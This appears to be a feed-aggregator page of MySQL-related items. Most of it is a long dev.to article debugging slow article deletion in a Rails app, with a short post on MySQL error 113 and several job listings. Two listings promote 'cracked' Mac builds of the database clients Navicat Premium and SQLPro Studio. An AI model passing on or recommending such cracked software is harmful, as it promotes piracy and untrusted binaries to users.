I need a new website. I already have a database, I just need you to create a website for my small business. With MVC architecture, using plain PHP, JavaScript, HTML, Bootstrap; the DB is MySQL... (Budget: $10 - $30 USD, Jobs: AJAX, Graphic Design, MySQL, PHP, Website Design)
          Building a PHP base website      Cache   Translate Page      
1) PHP base CMS with mysql, suggestion Drupal 2) Need to consume existing site migrated content through JSON flat file from another CMS "CoreMedia" (Phase 1) 3) with forum and marketplace (Phase 2 & 3)... (Budget: $1500 - $3000 SGD, Jobs: Drupal, HTML, MySQL, PHP, Website Design)
          WOO COMMERCE EXPERTS ONLY PLZ. When customer checks out it stalls the website severely      Cache   Translate Page      
This is the error shown by woo commerce system manager. ### WordPress Environment ### Home URL: https://xtremenutrition.co.za Site URL: https://xtremenutrition.co.za WC Version: 3.4.5 Log Directory Writable:... (Budget: $30 - $250 USD, Jobs: Linux, MySQL, PHP, WooCommerce, WordPress)
          Check Apache, php, .htaccess settings      Cache   Translate Page      
Quick help needed to check Apache, php, .htaccess settings (Budget: $10 USD, Jobs: Apache, Linux, MySQL, PHP, System Admin)
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          PHP - Module Lead - Mphasis - Bengaluru, Karnataka      Cache   Translate Page      
Total 6 – 8 years related experience in IT • Professional experience in PHP/MySQL (LAMP) stack development – 5 years ( 7 for senior) • Professional experience...
From Mphasis - Thu, 27 Sep 2018 12:28:53 GMT - View all Bengaluru, Karnataka jobs
          Magento developer urgent      Cache   Translate Page      
I need my website re-configured. I need you to design and build my online store. (Budget: $2 - $8 USD, Jobs: MySQL, PHP, Shopify, System Admin, WordPress)
          Selling car parts based on tecdoc      Cache   Translate Page      
I want a website where I can sell car parts based on registration number lookup, such as eurodel.no (Budget: $25 - $50 USD, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          Android Developer - vikas Global Solutions Ltd - Madhavanpark, Karnataka      Cache   Translate Page      
Android Application Development, Android SDK’s, API, HTML,CSS, MYSQL. Android Application Development. Vikas Global Solutions Ltd....
From Indeed - Mon, 10 Sep 2018 05:26:38 GMT - View all Madhavanpark, Karnataka jobs
          Pre-select a select option with the id inserted in the DB with PHP, MySQL      Cache   Translate Page      

Pre-select a select option with the id inserted in the DB with PHP, MySQL

Reply to: Pre-select a select option with the id inserted in the DB with PHP, MySQL

Hello,

if on error it correctly shows the "Ocurrió un problema con el servidor" ("A problem occurred with the server") message, it means you are receiving the value of "$this->mensaje" through jQuery, so you should replace $this->mensaje = 1; with $this->mensaje = $idcon->lastInsertId(); which will give you the id of the last inserted row.

I don't know if it's what you need, but give it a try ;)

Published on October 10, 2018 by santi

          Wordpress Developer proficient in Divi, SVN and MySQL      Cache   Translate Page      
We are looking for a reliable, punctual Wordpress Developer to assist with multiple ongoing website developments. Fluent English a must. MUST be adept in SVN, Wordpress and MySQL. Proficient in using Divi... (Budget: $400 - $450 AUD, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          Navicat Premium 12.1.9 Mac cracked version – the most powerful database client on Mac      Cache   Translate Page      
Navicat is the best graphical database management client. It supports databases such as MySQL, SQL Server, SQLite, Oracle and PostgreSQL, along with database modeling, forward and reverse engineering, data synchronization and more. The Premium edition bundles all of Navicat's features into its most powerful version, making it a first choice among database client tools!
          SQLPro Studio 1.0.302 Mac cracked version – an excellent database client      Cache   Translate Page      
SQLPro Studio is an excellent database client for Mac. It supports mainstream databases such as Postgres, MySQL, Microsoft SQL Server and Oracle, and makes managing databases convenient and easy. Quite good!
          Has pmm's mysqld_exporter been redeveloped? or the same as on github?      Cache   Translate Page      
Has pmm's mysqld_exporter been redeveloped? Or is it the same as the one on GitHub? https://github.com/prometheus/mysqld_exporter
          woocommerce reporting      Cache   Translate Page      
We need to query woocommerce sales by a date range and by a custom field called _supplier. The script will include a list of current suppliers that can be selected. The date is then selected. For example, last month, last 4 months, or last 12 months... (Budget: $30 - $250 USD, Jobs: MySQL, PHP, Software Architecture, WooCommerce, WordPress)
          [lubuntu] What's the proper way to upgrade from MySQL 5.7 to MariaDB 10.1 on 18.04.1      Cache   Translate Page      
I have a server running in my house and noticed that it still had MySQL 5.7 on it even after I upgraded to 18.04. So, I decided to take a crack at upgrading to MariaDB. Most of the guides I found told me to back up my databases, stop mysqld, and then remove mysql-server and mysql-client. Then...
          I want to configure Nginx, MySQL, PHP on CentOS      Cache   Translate Page      

Hello friends; as you know, Nginx is an open-source, web-oriented piece of software and is compatible with PHP v7, the latest PHP version available so far. In this tutorial we are going to look at LEMP (Linux, Nginx, MySQL, PHP), with everything set up on the CentOS operating system […]

The post I want to configure Nginx, MySQL, PHP on CentOS appeared first on Web Dadeh.


          Come with me on a journey through this website's source code by way of a bug      Cache   Translate Page      

This article started because I thought that researching a particular bug could be useful to understand dev.to's source code a little better. So I literally wrote this while doing the research and I ended up writing about other things as well. Here we go.

The bug I'm referring to is called Timeouts when deleting a post on GitHub. As the title implies, removing a post results in a server timeout, which results in an error for the user. @peter in his bug report added a couple of details we need to keep in mind for our "investigation": this bug doesn't always happen (a deterministic bug would be easier to hunt down in the context of finding a solution) and it more likely presents itself with articles that have many reactions and comments.

First clues: it happens sometimes and usually with articles with a lot of data attached.

Let's see if we can dig up more information before diving into the code.

A note: I'm writing this post to explain (and expand) the way I researched this while it happened at the same time (well, over the course of multiple days but still at the same time :-D), so all discoveries were new to me when I wrote about them as they are to you if you read this.

Another note: I'm going to use the terms "async" and "out of process" interchangeably here. Async in this context means "the user doesn't wait for the call to be executed", not "async" as in JavaScript. A better term would be "out of process" because these asynchronous calls are executed by an external process, through a queue on the database, with a library/gem called delayed job.
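That enqueue-instead-of-invoke shape can be sketched in plain Ruby. This is a toy illustration, not the real delayed_job gem: DelayProxy, Delayable and the User class here are made up for the example.

```ruby
# Toy sketch of the "out of process" pattern: .delay enqueues the call
# instead of running it; a worker drains the queue later.
class DelayProxy
  Job = Struct.new(:receiver, :name, :args)
  QUEUE = []

  def initialize(receiver)
    @receiver = receiver
  end

  # Capture any method call and store it for later execution.
  def method_missing(name, *args)
    QUEUE << Job.new(@receiver, name, args)
  end

  def respond_to_missing?(_name, _include_private = false)
    true
  end
end

module Delayable
  def delay
    DelayProxy.new(self)
  end
end

class User
  include Delayable
  attr_reader :resaves

  def initialize
    @resaves = 0
  end

  def resave_articles
    @resaves += 1
  end
end

user = User.new
user.delay.resave_articles   # only enqueued, nothing runs yet
puts user.resaves            # => 0
# A worker process would do something equivalent to:
DelayProxy::QUEUE.each { |job| job.receiver.send(job.name, *job.args) }
puts user.resaves            # => 1
```

The real gem persists jobs in a delayed_jobs table and a separate worker process drains them, but the control flow is the same: user.delay.resave_articles returns immediately and the method body runs later.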

Referential integrity

ActiveRecord (Rails's ORM), like many other object relational mappers, is an object layer that sits on top of a relational database system. Let's take a little detour and talk a little about a fundamental feature to preserve data meaningfulness in database systems: referential integrity. Why not, the bug can wait!

Referential integrity, to simplify a lot, is a defense against developers with weird ideas on how to structure their relational data. It forbids insertion of rows that have no correspondence in the primary table of the relationship. In layman's terms it guarantees that there is a corresponding row in the relationship: if you have a table with a list of 10 cities, you shouldn't have a customer whose address belongs to an unknown city. Funnily enough, it took more than a decade for MySQL to activate referential integrity by default, while PostgreSQL had already had it for 10 years at the time. Sometimes I think that MySQL in its early incarnations was a giant collection of CSV files with SQL on top. I'm joking, maybe.

With referential integrity in place you can rest (mostly) assured that the database won't let you add zombie rows, will keep the relationship updated and will clean up after you if you tell it to.

How do you instruct the database to do all of these things? It's quite simple. I'll use an example from PostgreSQL 10 documentation:

CREATE TABLE products (
    product_no integer PRIMARY KEY,
    name text,
    price numeric
);

CREATE TABLE orders (
    order_id integer PRIMARY KEY,
    shipping_address text
);

CREATE TABLE order_items (
    product_no integer REFERENCES products ON DELETE RESTRICT,
    order_id integer REFERENCES orders ON DELETE CASCADE,
    quantity integer,
    PRIMARY KEY (product_no, order_id)
);

The table order_items has two foreign keys, one towards orders and another that points to products (a classic example of many-to-many in case you're wondering).

When you design tables like this you should ask yourself the following questions (in addition to the obvious ones like "what am I really doing with this data?"):

  • what happens if a row in the primary table is deleted?

  • do I want to delete all the related rows?

  • do I want to set the referencing column to NULL? in that case what does it mean for my business logic? does NULL even make sense for my data?

  • do I want to set the column to its default value? what does it mean for my business logic? does this column even have a default value?

If you look back at the example what we're telling the database are the following two things:

  • products cannot be removed, unless they do not appear in any order

  • orders can be removed at all times, and they take the items with them to the grave 😀

Keep in mind that removal in this context is still a fast operation: even in a context like dev.to's, if an article had tables linked to it with a cascade directive, deleting it should still be fast. DBs tend to become slow when a single DELETE triggers millions (or tens of millions) of other removals. I assume this is not the case here (yet, or in the future) but since the point of this whole section is to expand our knowledge about referential integrity and not to actually investigate the bug, let's keep on digging.

Next we open the console and check if the tables are linked to each other, using psql :

$ rails dbconsole
psql (10.5)
Type "help" for help.

PracticalDeveloper_development=# \d+ articles
...
Indexes:
    "articles_pkey" PRIMARY KEY, btree (id)
    "index_articles_on_boost_states" gin (boost_states)
    "index_articles_on_featured_number" btree (featured_number)
    "index_articles_on_hotness_score" btree (hotness_score)
    "index_articles_on_published_at" btree (published_at)
    "index_articles_on_slug" btree (slug)
    "index_articles_on_user_id" btree (user_id)

This table has a primary key, a few indexes but apparently no foreign key constraints (the indicators for referential integrity). Compare it with a table that has both:

PracticalDeveloper_development=# \d users
...
Indexes:
    "users_pkey" PRIMARY KEY, btree (id)
    "index_users_on_confirmation_token" UNIQUE, btree (confirmation_token)
    "index_users_on_reset_password_token" UNIQUE, btree (reset_password_token)
    "index_users_on_username" UNIQUE, btree (username)
    "index_users_on_language_settings" gin (language_settings)
    "index_users_on_organization_id" btree (organization_id)
Referenced by:
    TABLE "messages" CONSTRAINT "fk_rails_273a25a7a6" FOREIGN KEY (user_id) REFERENCES users(id)
    TABLE "badge_achievements" CONSTRAINT "fk_rails_4a2e48ca67" FOREIGN KEY (user_id) REFERENCES users(id)
    TABLE "chat_channel_memberships" CONSTRAINT "fk_rails_4ba367990a" FOREIGN KEY (user_id) REFERENCES users(id)
    TABLE "push_notification_subscriptions" CONSTRAINT "fk_rails_c0b1e39717" FOREIGN KEY (user_id) REFERENCES users(id)

This is what we learned so far: why referential integrity can come into play when you remove rows from a DB and that the articles table has no apparent relationships with any other table at the database level. But is this true in the web app? Let's move up one layer, diving into the Ruby code.

P.S. in the case of Rails (I don't remember since which version) you can also see which foreign keys you have defined by looking at the schema.rb file.

ActiveRecord, associations and callbacks

Now that we know what referential integrity is, how to identify it, and that it's not at play in this bug, we can move up a layer and check how the Article object is defined (I'll skip stuff that I think is not related to this article and the bug itself, although I might be wrong because I don't know the code base well):

class Article < ApplicationRecord
  # ...

  has_many :comments,       as: :commentable
  has_many :buffer_updates
  has_many :reactions,      as: :reactable, dependent: :destroy
  has_many  :notifications, as: :notifiable

  # ...

  before_destroy    :before_destroy_actions

  # ...

  def before_destroy_actions
    bust_cache
    remove_algolia_index
    reactions.destroy_all
    user.delay.resave_articles
    organization&.delay&.resave_articles
  end
end

A bunch of new information from that piece of code:

  • Rails (but not the DB) knows that an article can have many comments, buffer updates, reactions and notifications (these are called "associations" in Rails lingo)

  • Reactions are explicitly dependent on the articles and they will be destroyed if the article is removed

  • There's a callback that does a bunch of stuff (we'll explore it later) before the object and its row in the database are destroyed

  • Three out of four associations are of the "-able" type. Rails calls these polymorphic associations because they allow the programmer to associate multiple types of objects to the same row, using two different columns (a string with the name of the model type the object belongs to and an id). They are very handy, though I always felt they make the database very dependent on the domain model (set by Rails). They can also require a composite index in the associated table to speed up queries

Similarly to what the underlying database system can do, ActiveRecord allows the developer to specify what happens to the related objects when the primary one is destroyed. According to the documentation Rails supports: destroying all related objects, deleting all related objects, setting the foreign key to NULL or restricting the removal with an error. The difference between destroy and delete is that in the former case all related callbacks are executed prior to removal, in the latter one the callbacks are skipped and only the row in the DB is removed.
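The destroy vs delete distinction can be sketched with a toy model in plain Ruby (not ActiveRecord; ToyReaction and its STORE array are stand-ins I made up for illustration):

```ruby
# destroy runs the before_destroy callbacks first, delete just drops
# the "row". This is why destroy can be much more expensive.
class ToyReaction
  STORE = []

  attr_reader :callbacks_run

  def initialize
    @callbacks_run = 0
    STORE << self
  end

  def before_destroy
    @callbacks_run += 1   # stands in for cache busting, reindexing, ...
  end

  def destroy
    before_destroy        # callbacks first...
    delete                # ...then remove the row
  end

  def delete
    STORE.delete(self)    # no callbacks: just the removal
  end
end

a = ToyReaction.new
b = ToyReaction.new
a.destroy
b.delete
puts a.callbacks_run          # => 1
puts b.callbacks_run          # => 0
puts ToyReaction::STORE.size  # => 0
```

In ActiveRecord the callbacks can be arbitrarily expensive (as this article's HTTP-call tally shows), so the choice between the two is not cosmetic.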

The default strategy for relationships without a dependent option is to do nothing, which means leaving the referenced rows there in place. If it were up to me the default would be "the app doesn't start until you decide what to do with the linked models", but I'm not the person who designed ActiveRecord.

Keep in mind that the database trumps the code, if you define nothing at the Rails level but the database is configured to automatically destroy all related rows, then the rows will be destroyed. This is one of the many reasons why it's worth taking the time to learn how the DB works :-)

The last bit of the model layer we haven't talked about is the callback, which is probably where the bug manifests itself.

The infamous callback

This before destroy callback will execute prior to issuing the DELETE statement to the DB:

def before_destroy_actions
  bust_cache
  remove_algolia_index
  reactions.destroy_all
  user.delay.resave_articles
  organization&.delay&.resave_articles
end

Cache busting

The first thing the callback does is call the method bust_cache which in turn calls the Fastly API six times sequentially to purge the article's cache (each call to bust is two HTTP calls). It also makes a conspicuous number of out-of-process calls to the same API (around 20-50, depending on the status of the article and the number of tags) but these don't matter because the user won't wait for them.

One thing to note: six HTTP calls always go out after you press the button to delete an article.

Index removal

dev.to uses Algolia for search; the call remove_algolia_index does the following:

  • calls algolia_remove_from_index! which in turn calls the "async" version of the Algolia HTTP API, which in reality does a (fast) synchronous call to Algolia without waiting for the index to be cleared on their side. It's still a synchronous call that adds to the user's latency

  • calls Algolia's HTTP API two more times for other indexes

So, adding the previous 6 HTTP calls for Fastly, we're at 9 API calls made in process.

Reactions destruction

The third step is reactions.destroy_all which, as the name implies, destroys all the reactions to the article. In Rails destroy_all simply iterates over all the objects and calls destroy on each of them, which in turn activates all the "destroy" callbacks for proper cleanup. The Reaction model has two before_destroy callbacks:

class Reaction < ApplicationRecord
  # ...

  before_destroy :update_reactable_without_delay
  before_destroy :clean_up_before_destroy

  # ...
end

I had to dig a little bit to find out what the first one does (one of the things I dislike about the Rails way of doing things are the magical methods popping up everywhere, they make refactoring harder and they encourage coupling between the model and all the various gems). update_reactable_without_delay calls update_reactable (which has been declared as an async function by default) bypassing the queue. The result is a standard inline call the user waits for.

  • update_reactable recalculates (this time out of process) the scores of the Article (a thing that should probably be avoided since the Article is up for removal) if the article has been published. Then (back inline) it reindexes the article (twice) calling Algolia, removes the reactions from Fastly's cache (each call to bust the cache is two Fastly calls), busts another cache (two more HTTP calls) and possibly updates a column on the Article (which is probably not needed since it's going to be removed). The total is 6 HTTP calls: one async HTTP call (the first one to Algolia), one other call to Algolia and four to Fastly. Let's note down the 5 the user has to wait for.

  • clean_up_before_destroy reindexes the article on Algolia (a third time).

Let's sum up: the removal of a reaction amounts to 6 HTTP calls. If the article has 100 reactions... well, you can do the math.

Let's say the article had 1 reaction; adding the calls tallied before, we're at around 15 HTTP calls:

  • 6 to bust the cache of the article

  • 3 to remove the article from the index

  • 6 for the reaction attached to the article

There's an additional bonus HTTP call that I've identified by chance using a gist to debug net/http calls: it calls the Stream.io API to delete the reaction from the user's feed. That brings the total to 16 HTTP calls.
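Using only the numbers tallied in this article, the inline HTTP cost of deleting an article can be roughly modeled as a function of the number of reactions (the function name is mine, not from the codebase, and the per-reaction figure folds in the Stream.io call mentioned above):

```ruby
# Rough cost model built only from the numbers tallied in this article.
def inline_http_calls(reactions_count)
  bust_article_cache = 6      # Fastly busts for the article itself
  algolia_deindex    = 3      # Algolia index removal calls
  per_reaction       = 6 + 1  # 6 cache/index calls + 1 Stream.io call
  bust_article_cache + algolia_deindex + per_reaction * reactions_count
end

puts inline_http_calls(1)    # => 16, matching the tally above
puts inline_http_calls(100)  # => 709 inline HTTP calls before the DELETE
```

With a popular article the user's request ends up waiting on hundreds of sequential HTTP calls, which is exactly the shape of a timeout.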

This is what happens when a reaction is destroyed (I added the awesome gem httplog to my local installation):

[httplog] Sending: PUT https://REDACTED.algolia.net/1/indexes/Article_development/25
[httplog] Data: {"title":" The Curious Incident of the Dog in the Night-Time"}
[httplog] Connecting: REDACTED.algolia.net:443
[httplog] Status: 200
[httplog] Benchmark: 0.357128 seconds
[httplog] Response:
{"updatedAt":"2018-10-09T17:23:44.151Z","taskID":945887592,"objectID":"25"}

[httplog] Sending: PUT https://REDACTED.algolia.net/1/indexes/searchables_development/articles-25
[httplog] Data: {"title":" The Curious Incident of the Dog in the Night-Time","tag_list":["discuss","security","python","beginners"],"main_image":"https://pigment.github.io/fake-logos/logos/medium/color/8.png","id":25,"featured":true,"published":true,"published_at":"2018-09-30T07:44:48.530Z","featured_number":1538293488,"comments_count":1,"reactions_count":0,"positive_reactions_count":0,"path":"/willricki/-the-curious-incident-of-the-dog-in-the-night-time-3e4b","class_name":"Article","user_name":"Ricki Will","user_username":"willricki","comments_blob":"Waistcoat craft beer pickled vice seitan kombucha drinking. 90's green juice hoodie.","body_text":"\n\nMeggings tattooed normcore kitsch chia. Fixie migas etsy hashtag jean shorts neutra pork belly. Vice salvia biodiesel portland actually slow-carb loko chia. Freegan biodiesel flexitarian tattooed.\n\n\nNeque. \n\n\nBefore they sold out diy xoxo aesthetic biodiesel pbr\u0026amp;b. Tumblr lo-fi craft beer listicle. Lo-fi church-key cold-pressed.\n\n\n","tag_keywords_for_search":"","search_score":153832,"readable_publish_date":"Sep 30","flare_tag":{"name":"discuss","bg_color_hex":null,"text_color_hex":null},"user":{"username":"willricki","name":"Ricki Will","profile_image_90":"/uploads/user/profile_image/6/22018b1a-7afa-47c1-bbae-b829977828e4.png"},"_tags":["discuss","security","python","beginners","user_6","username_willricki","lang_en"]}
[httplog] Status: 200
[httplog] Benchmark: 0.031995 seconds
[httplog] Response:
{"updatedAt":"2018-10-09T17:23:44.426Z","taskID":945887612,"objectID":"articles-25"}

[httplog] Sending: PUT https://REDACTED.algolia.net/1/indexes/ordered_articles_development/articles-25
[httplog] Data: {"title":" The Curious Incident of the Dog in the Night-Time","path":"/willricki/-the-curious-incident-of-the-dog-in-the-night-time-3e4b","class_name":"Article","comments_count":1,"tag_list":["discuss","security","python","beginners"],"positive_reactions_count":0,"id":25,"hotness_score":153829,"readable_publish_date":"Sep 30","flare_tag":{"name":"discuss","bg_color_hex":null,"text_color_hex":null},"published_at_int":1538293488,"user":{"username":"willricki","name":"Ricki Will","profile_image_90":"/uploads/user/profile_image/6/22018b1a-7afa-47c1-bbae-b829977828e4.png"},"_tags":["discuss","security","python","beginners","user_6","username_willricki","lang_en"]}
[httplog] Status: 200
[httplog] Benchmark: 0.047077 seconds
[httplog] Response:
{"updatedAt":"2018-10-09T17:23:44.494Z","taskID":945887622,"objectID":"articles-25"}

[httplog] Sending: PUT https://REDACTED.algolia.net/1/indexes/Article_development/25
[httplog] Data: {"title":" The Curious Incident of the Dog in the Night-Time"}
[httplog] Status: 200
[httplog] Benchmark: 0.029352 seconds
[httplog] Response:
{"updatedAt":"2018-10-09T17:23:44.541Z","taskID":945887632,"objectID":"25"}

[httplog] Sending: PUT https://REDACTED.algolia.net/1/indexes/searchables_development/articles-25
[httplog] Data: {"title":" The Curious Incident of the Dog in the Night-Time","tag_list":["discuss","security","python","beginners"],"main_image":"https://pigment.github.io/fake-logos/logos/medium/color/8.png","id":25,"featured":true,"published":true,"published_at":"2018-09-30T07:44:48.530Z","featured_number":1538293488,"comments_count":1,"reactions_count":0,"positive_reactions_count":1,"path":"/willricki/-the-curious-incident-of-the-dog-in-the-night-time-3e4b","class_name":"Article","user_name":"Ricki Will","user_username":"willricki","comments_blob":"Waistcoat craft beer pickled vice seitan kombucha drinking. 90's green juice hoodie.","body_text":"\n\nMeggings tattooed normcore kitsch chia. Fixie migas etsy hashtag jean shorts neutra pork belly. Vice salvia biodiesel portland actually slow-carb loko chia. Freegan biodiesel flexitarian tattooed.\n\n\nNeque. \n\n\nBefore they sold out diy xoxo aesthetic biodiesel pbr\u0026amp;b. Tumblr lo-fi craft beer listicle. Lo-fi church-key cold-pressed.\n\n\n","tag_keywords_for_search":"","search_score":154132,"readable_publish_date":"Sep 30","flare_tag":{"name":"discuss","bg_color_hex":null,"text_color_hex":null},"user":{"username":"willricki","name":"Ricki Will","profile_image_90":"/uploads/user/profile_image/6/22018b1a-7afa-47c1-bbae-b829977828e4.png"},"_tags":["discuss","security","python","beginners","user_6","username_willricki","lang_en"]}
[httplog] Status: 200
[httplog] Benchmark: 0.028819 seconds
[httplog] Response:
{"updatedAt":"2018-10-09T17:23:44.612Z","taskID":945887642,"objectID":"articles-25"}

[httplog] Sending: PUT https://REDACTED.algolia.net/1/indexes/ordered_articles_development/articles-25
[httplog] Data: {"title":" The Curious Incident of the Dog in the Night-Time","path":"/willricki/-the-curious-incident-of-the-dog-in-the-night-time-3e4b","class_name":"Article","comments_count":1,"tag_list":["discuss","security","python","beginners"],"positive_reactions_count":1,"id":25,"hotness_score":153829,"readable_publish_date":"Sep 30","flare_tag":{"name":"discuss","bg_color_hex":null,"text_color_hex":null},"published_at_int":1538293488,"user":{"username":"willricki","name":"Ricki Will","profile_image_90":"/uploads/user/profile_image/6/22018b1a-7afa-47c1-bbae-b829977828e4.png"},"_tags":["discuss","security","python","beginners","user_6","username_willricki","lang_en"]}
[httplog] Status: 200
[httplog] Benchmark: 0.02821 seconds
[httplog] Response:
{"updatedAt":"2018-10-09T17:23:44.652Z","taskID":945887652,"objectID":"articles-25"}

[httplog] Connecting: us-east-api.stream-io-api.com:443
[httplog] Sending: DELETE http://us-east-api.stream-io-api.com:443/api/v1.0/feed/user/10/Reaction:7/?api_key=REDACTED&foreign_id=1
[httplog] Data:
[httplog] Status: 200
[httplog] Benchmark: 0.336152 seconds
[httplog] Response:
{"removed":"Reaction:7","duration":"17.84ms"}

If you count them, there are 7, not 16. That's because the calls to Fastly are only executed in production.

Resaving articles

User.resave_articles refreshes the user's other articles and is called out of process, so it's not interesting to us right now. The same happens for the organization if the article belongs to one, so again we don't care.

Let's recap what we know so far. Each article removal triggers a callback that does a lot of things touching the third-party services that help this website be as fast as it is, and it also updates various counters I didn't really investigate :-D.

What happens when the article is removed

After the callback has been dealt with, all the various caches are up to date and the reactions are gone from the database, we still need to check what happens to the other associations of the article we're removing. As you recall, every article can have comments, reactions (gone by now), buffer updates (not sure what those are) and notifications.

Let's see what happens when we destroy an article to see if we can get other clues. I replaced a long log with my summaries:

> art = Article.last # article id 25
> art.destroy!
# its tags are destroyed, this is handled by "acts_as_taggable_on :tags"...
# a bunch of other tag related stuff happens, 17 select calls...
# the aforementioned HTTP calls for each reaction are here too...
# there's a SQL DELETE for each reaction...
# the user object is updated...
# a couple of other UPDATEs I didn't investigate but which seem really plausible...
# the HTTP calls to remove the article itself from search...
# the article is finally deleted from the db...
# the article count for the user is updated

Aside from the fact that in my initial overview I totally forgot about the destruction of the tags (each amounts to a DELETE and an UPDATE on the database), I would say there's a lot going on when an article is removed.

What happens to the rest of the objects we didn't find in the console?

If you remember from earlier: in Rails relationships, everything not explicitly marked as "dependent" survives the destruction of the primary object, so they are all still in the DB:

PracticalDeveloper_development=# select count(*) from comments where commentable_id = 25;
 count
-------
     3
PracticalDeveloper_development=# select count(*) from notifications where notifiable_id = 25;
 count
-------
     2
PracticalDeveloper_development=# select count(*) from buffer_updates where article_id = 25;
 count
-------
     1
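To make that concrete, here is roughly what such declarations look like (a hypothetical sketch for illustration, not dev.to's actual model code):

```ruby
class Article < ApplicationRecord
  has_many :reactions, as: :reactable, dependent: :destroy # loaded and destroyed one by one, callbacks fire
  has_many :comments,  as: :commentable                    # no :dependent option — rows survive the destroy
  has_many :notifications, as: :notifiable                 # survives
  has_many :buffer_updates                                 # survives
end
```

Only the association carrying a `:dependent` option participates in the destroy; the others are simply left orphaned in their tables, which matches the counts above.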

I think we can be fairly confident that the issue that sparked this article is likely to manifest when the article is really popular before being removed, having many reactions, comments and notifications.

Timeout

Another factor I mentioned in a comment on the issue is Heroku's default timeout. dev.to, IIRC, runs on Heroku, which enforces a 30-second timeout on HTTP requests once the router has passed them on (so it's a timer on your app code). If the app doesn't respond within 30 seconds, the request times out and an error is returned.

dev.to, savvily, cuts this timeout in half by using rack-timeout's default service timeout, which is 15 seconds.

In brief: if, after hitting the "remove article" button, the server doesn't finish within 15 seconds, a timeout error is raised. Having seen that a popular article can trigger dozens of HTTP calls, you can understand why in some cases the 15-second wall can be hit.
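For reference, rack-timeout is typically wired up along these lines (a minimal sketch; the 15 seconds mirrors the gem's default service timeout mentioned above — check the gem's README for the exact options it supports in your version):

```ruby
# config.ru — or let the gem's Railtie insert the middleware for you
use Rack::Timeout, service_timeout: 15 # Rack::Timeout::RequestTimeoutException after 15s
```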

Recap

Let's recap what we learned so far about what happens when an article is removed:

  • referential integrity can be a factor if the article has millions of related rows (unlikely in this scenario)

  • Rails removing associated objects sequentially is a factor (considering that it also has to load those objects from the DB into the ORM before removing them, which it must do if it wants to trigger the various callbacks)

  • Inline callbacks and HTTP calls are another factor

  • Rails is not very smart here: it could decrease the number of calls to the DB (for example by batching the DELETE statements for all the reactions into one, using an IN clause)

  • Rails magic is sometimes annoying 😛
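In ActiveRecord terms, the batching point above maps onto `destroy_all` versus `delete_all` (a sketch — note that switching would skip exactly the callbacks discussed earlier):

```ruby
article.reactions.destroy_all  # loads every Reaction, issues one DELETE per row, callbacks run
article.reactions.delete_all   # a single DELETE ... WHERE on the association, no callbacks
```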

Possible solutions

This is where I stop for now, because I'm not that familiar with the code base (well, after this, definitely more than before :D) and because I think it could be an interesting "collective" exercise, since it's not a critical bug that needs to be fixed "yesterday".

At first, the simplest solution that could pop into one's mind is to move everything that happens inline when an article is removed into an out-of-process call, delegating everything to a job picked up by the queue manager. The user just needs the article gone from their view, after all. The proper removal can happen in a worker process. Aside from the fact that I'm not sure I've considered everything that's going on (I found out about tags by chance, as you saw) and all the implications, I think this is just a quick win. It would fix the user's problem by sweeping the reported issue under the rug.

Another possible solution is to split the removal into its two main parts: the caches need to be updated or emptied, and the rows need to be removed from the DB. The caches can all be invalidated out of process so the user doesn't have to wait for Fastly or Algolia (maybe only Stream.io? I don't know). This requires a bit of refactoring, because some of the code I talked about is also used by other parts of the app.
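A hypothetical shape for that split, with the slow cache busting pushed to a worker (class and helper names invented for illustration):

```ruby
class BustArticleCachesJob < ApplicationJob
  queue_as :default

  def perform(article_path)
    # the Fastly/Algolia HTTP calls move here, off the request cycle
    CacheBuster.new.bust(article_path)
    CacheBuster.new.bust("#{article_path}/comments")
  end
end

# inline, the destroy action only enqueues:
# BustArticleCachesJob.perform_later(article.path)
```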

A more complete solution is to go a step further than the second one and also clean up all the leftovers (comments, notifications and buffer updates), though there might be a reason why they are left there in the first place. All three entities can be removed in a separate job, but note that two out of three have before_destroy callbacks which trigger other stuff I haven't looked at.

This should definitely be enough for the user to never encounter the pesky timeout error again. To go an extra mile we could also look into the fact that ActiveRecord issues a single DELETE for each object it removes from the database, but that is definitely too much for now. I would note it somewhere and come back to it after the refactoring, if needed.

Conclusions

If you are still with me, thank you. It took me quite a while to write this :-D

I don't have any mighty conclusions. I hope this deep dive into dev.to's source code served at least a purpose. For me it has been a great way to learn a bit more and to write about something that non-Rails developers here might not know, but more importantly to help potential contributors.

I'm definitely hoping for some feedback ;-)


          When is a MySQL error not a MySQL error      Cache   Translate Page      

Photo by Cassidy Mills on Unsplash

I came across this error recently: Mysql2::Error: Can't connect to MySQL server on 'some-db-server.example.com' (113)

A quick search on the Internet resulted in various Q&A sites hinting at a connectivity/routing issue to/from the MySQL server.

While this was probably enough information for me to fix the problem, if it exists on a third party's infrastructure you want to provide a bit more information.

The first port of call was to see if error code 113 appears in the MySQL reference. You can imagine my surprise when I couldn't find 113 anywhere in that chapter.

Luckily there is help available from MySQL in the form of a utility called perror that allows you to look up MySQL error codes.

By typing perror along with the error code, you'll get the following:

$ perror 113
OS error code 113:  No route to host

So the reason we can't find this error in either the Client or Server sections of the MySQL reference manual is that it's an operating system error.

The operating system in question is Linux, so we know we're looking for C error number codes (errno.h). If you've got access to the kernel source you can find it in /usr/src/linux-source-<VERSION>/include/uapi/asm-generic/errno.h; if you don't have the source installed, you can see a definition of 113 on GitHub:

#define    EHOSTUNREACH    113    /* No route to host */
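Since the error surfaced through the Ruby Mysql2 gem, you can also look the code up without leaving Ruby: the stdlib's Errno module mirrors errno.h (the values are platform-specific; 113 is Linux's):

```ruby
# Map OS errno 113 back to its meaning with Ruby's stdlib (Linux values).
err = SystemCallError.new(113)     # picks the matching Errno subclass for the code
puts err.class                     # Errno::EHOSTUNREACH (on Linux)
puts err.message                   # "No route to host"
puts Errno::EHOSTUNREACH::Errno    # the platform's numeric value, 113 on Linux
```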

So armed with this information, I could contact the 3rd party and ask them to check routing and firewall rules between us and the database server.


          Learning how to learn: CS Edition      Cache   Translate Page      

I never thought I would be a Software Engineer. Back when I was little I had the firm conviction that I would be an Architect, but something happened... I realized that the more I grew up, the more interested I became in computers. After my third semester of high school (I live in México, and in my state public high school lasts 4 semesters) I came to an answer: I had decided to do a BS in Computer Science.

